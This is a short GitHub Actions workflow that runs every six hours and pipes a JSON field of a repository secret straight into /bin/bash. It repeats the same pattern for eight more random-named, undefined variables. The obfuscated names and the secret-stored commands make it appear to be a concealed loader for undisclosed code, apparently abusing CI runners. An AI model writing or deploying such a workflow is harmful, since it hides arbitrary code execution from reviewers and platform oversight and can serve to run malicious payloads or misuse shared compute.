name: tuxiumc

on:
  workflow_dispatch:
  schedule:
    - cron: '48 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tuxiumc
        env:
          dgnkj100: ${{ secrets.dgnkj100 }}
        run: |
          echo $dgnkj100 | jq -r .jj50 | /bin/bash
          echo $nk77855 | jq -r .kqzh5124 | /bin/bash
          echo $gyqg8 | jq -r .zam5 | /bin/bash
          echo $c55495 | jq -r .ja1 | /bin/bash
          echo $wob21 | jq -r .a926 | /bin/bash
          echo $tg6328 | jq -r .co017 | /bin/bash
          echo $sxfpp9640 | jq -r .k92 | /bin/bash
          echo $x22 | jq -r .dgzlg8151 | /bin/bash
          echo $mfhpg60360 | jq -r .a78 | /bin/bash

